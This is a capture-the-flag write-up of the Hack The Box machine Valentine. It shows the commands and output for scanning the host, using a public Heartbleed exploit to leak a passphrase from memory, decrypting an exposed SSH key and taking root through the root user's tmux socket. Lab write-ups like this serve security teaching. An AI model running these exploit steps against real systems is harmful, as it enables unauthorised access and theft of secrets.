Hack The Box: Valentine

13 minute read

Hello everyone! Today, we are going to do Valentine of Hack the Box.

Enumeration

First, nmap is used to get a first overview over the target.

nmap -sV -oA initial 10.10.10.79

# Nmap 7.70 scan initiated Sun Jul 22 10:31:26 2018 as: nmap -sV -oA initial 10.10.10.79
Nmap scan report for 10.10.10.79
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 22 10:31:54 2018 -- 1 IP address (1 host up) scanned in 28.44 seconds

Since a SSH and an Apache server are exposed, we can take a look at the website. The main page gives a broad hint, that the used SSL version is maybe affected by heartbleed. We can check it with nmap:

nmap --script vuln -p 443 10.10.10.79

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-30 14:43 BST                                                                                                                                                    
Nmap scan report for 10.10.10.79                                                                                                                                                                                   
Host is up (0.017s latency).                                                                                                                                                                                       

PORT    STATE SERVICE                                                                                                                                                                                              
443/tcp open  https                                                                                                                                                                                                
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                                                                               
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                                              
| http-enum:                                                                                                                                                                                                       
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'                                                                                                                                
|_  /index/: Potentially interesting folder                                                                                                                                                                        
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                                                   
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                                                                                      
| ssl-ccs-injection:                                                                                                                                                                                               
|   VULNERABLE:                                                                                                                                                                                                    
|   SSL/TLS MITM vulnerability (CCS Injection)                                                                                                                                                                     
|     State: VULNERABLE                                                                                                                                                                                            
|     Risk factor: High                                                                                                                                                                                            
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h                                                                                                                                       
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero                                                                                                                                    [0/31]
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.                       
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.                                                                         
|
|     References:
|       http://cvedetails.com/cve/2014-0160/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://www.openssl.org/news/secadv_20140407.txt
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  OSVDB:113251
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       http://osvdb.org/113251
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:

Nmap done: 1 IP address (1 host up) scanned in 37.31 seconds

The nmap scan verifies that the OpenSSL version is in fact vulnerable to heartbleed and maybe some other flaws like Poodle or CCS Injection.

Further, we can check for interesting files and directories with gobuster.

gobuster -u http://10.10.10.79/ -w ~/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.79/
[+] Threads      : 10
[+] Wordlist     : /root/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/index (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/decode (Status: 200)

The two files encode.php and decode.php are just simple base64 encoder and decoder and are not really important for us. However, the directory /dev contains an interesting file called hype_key which is encoded. Obviously it’s Ascii hex encoded cat hype_key | xxd -r -ps As a result we get an RSA private key which is encrypted. That the file is encrypted can be identified by the first line Proc-Type: 4,ENCRYPTED.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

First, we can try to crack the passphrase with john after converting it with ssh2john, but this does not work. Therefore, we can look further because we have the heartbleed vulnerability as plan B.

Exploitation

Heartbleed is a serious implementation flaw in the popular OpenSSL cryptographic software library and can be used to leak parts of the memory. The leak occurs because the requested message size is not validated and therefore, read behind a message if the message is smaller than the requested size (Out of bounds read).

We can abuse this vulnerability with publicly available scripts. So, we search for a suitable exploit in Kali with searchsploit heartbleed.

searchsploit heartbleed
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)                                                                       | exploits/multiple/remote/32764.py
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)                                                                                                       | exploits/multiple/remote/32791.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)                                                                                        | exploits/multiple/remote/32998.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure                                                                                                          | exploits/multiple/remote/32745.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We can copy the exploit to the current working directory with searchsploit -m exploits/multiple/remote/32745.py.

python 32745.py 10.10.10.79                                                                                                                                           [991/1189]
Connecting...                                                                                                                                                                                                      
Sending Client Hello...                                                                                                                                                                                      
Waiting for Server Hello...                                                                                                                                                                                 
 ... received message: type = 22, ver = 0302, length = 66                                                                                                                                                   
 ... received message: type = 22, ver = 0302, length = 885                                                                                                                                                   
 ... received message: type = 22, ver = 0302, length = 331                                                                                                                                                         
 ... received message: type = 22, ver = 0302, length = 4                 
Sending heartbeat request...                                                                                                                                                                                       
 ... received message: type = 24, ver = 0302, length = 16384                                                                             
Received heartbeat response:                                             
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...                  
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......  
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.  
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................                                                
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.         
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...                                                                                                                                          
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............                                                                                                        
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................                                                                                                                          
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.                                                                                                                                          
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............                                                                                                                                    
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................                                                                                                                                   
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................                                                                                                                                   
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 30 2E 30 2E  ....#.......0.0.                                                                                                                                    
  00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co                                                                                                                                          
  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo                                                                                                                                          
  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C                                                                
  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D 8F  mV0aGVoeXBlCg==.
  0160: A7 30 5A CB EA DF 57 B4 98 FD 1A E5 78 AA E8 DE  .0Z...W.....x...
  0170: 08 3C C2 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  .<..............

If we look carefully over the memory dump we can see that there is a base64 string used at decode.php.

echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d                                                                                                                     
heartbleedbelievethehype

The retrieved password can be used to decrypt the earlier found ssh private key.

# chmod 600 hype_key_decoded  
# ssh -i hype_key_decoded hype@10.10.10.79
Enter passphrase for key 'hype_key_decoded':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Mon Jul 30 06:28:13 2018 from 10.10.15.45
hype@Valentine:~$

Now, we can just read the user.txt cat Desktop/user.txt.

Privilege Escalation

First command we use is ls in the root directory.

ls -lah /

total 108K
drwxr-xr-x  26 root root 4.0K Feb  6 11:56 .
drwxr-xr-x  26 root root 4.0K Feb  6 11:56 ..
drwxr-xr-x   2 root root 4.0K Dec 11  2017 bin
drwxr-xr-x   3 root root 4.0K Feb 16 14:41 boot
drwxr-xr-x   2 root root 4.0K Dec 11  2017 cdrom
drwxr-xr-x  13 root root 4.0K Jul 30 06:08 dev
drwxr-xr-x   2 root root 4.0K Dec 13  2017 devs
drwxr-xr-x   2 root hype 4.0K Jul 30 06:08 .devs
drwxr-xr-x 132 root root  12K Jul 30 06:08 etc
drwxr-xr-x   3 root root 4.0K Dec 11  2017 home
lrwxrwxrwx   1 root root   32 Dec 11  2017 initrd.img -> boot/initrd.img-3.2.0-23-generic
drwxr-xr-x  21 root root 4.0K Dec 11  2017 lib
drwxr-xr-x   2 root root 4.0K Apr 25  2012 lib64
drwx------   2 root root  16K Dec 11  2017 lost+found
drwxr-xr-x   3 root root 4.0K Apr 25  2012 media
drwxr-xr-x   3 root root 4.0K Dec 11  2017 mnt
drwx------   2 root root 4.0K Dec 13  2017 opt
dr-xr-xr-x 101 root root    0 Jul 30 06:07 proc
drwx------   4 root root 4.0K Feb  6 12:00 root
drwxr-xr-x  20 root root  740 Jul 30 07:04 run
drwxr-xr-x   2 root root 4.0K Feb 16 14:40 sbin
drwxr-xr-x   2 root root 4.0K Mar  5  2012 selinux
drwxr-xr-x   2 root root 4.0K Apr 25  2012 srv
drwxr-xr-x  13 root root    0 Jul 30 06:08 sys
drwxrwxrwt   5 root root 4.0K Jul 30 07:06 tmp
drwxr-xr-x  10 root root 4.0K Apr 25  2012 usr
drwxr-xr-x  14 root root 4.0K Feb  6 12:01 var
lrwxrwxrwx   1 root root   29 Dec 11  2017 vmlinuz -> boot/vmlinuz-3.2.0-23-generic

We can identify an unusual folder named .devs. Now, we can run the command file to identify the file. A socket file? Since we don’t know what to do with this file, let’s find out if some process is using it.

ps -aux | grep dev
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root         10  0.0  0.0      0     0 ?        S    06:08   0:00 [kdevtmpfs]
root         60  0.0  0.0      0     0 ?        S<   06:08   0:00 [devfreq_wq]
root        314  0.0  0.0  17224   640 ?        S    06:08   0:00 upstart-udev-bridge --daemon
root        317  0.0  0.1  21876  1636 ?        Ss   06:08   0:00 /sbin/udevd --daemon
root        501  0.0  0.1  21872  1160 ?        S    06:08   0:00 /sbin/udevd --daemon
root        502  0.0  0.1  21872  1116 ?        S    06:08   0:00 /sbin/udevd --daemon
root       1006  0.0  0.1  26416  1680 ?        Ss   06:08   0:01 /usr/bin/tmux -S /.devs/dev_sess
hype       3658  0.0  0.0  13580   944 pts/1    S+   07:09   0:00 grep --color=auto dev

We can see that the user root is using this file as a session file for tmux. Tmux is a terminal multiplexer and I can truly recommend it! To use this session we can just run tmux -S dev_sess and cat /root/root.txt.

Happy Hacking! =)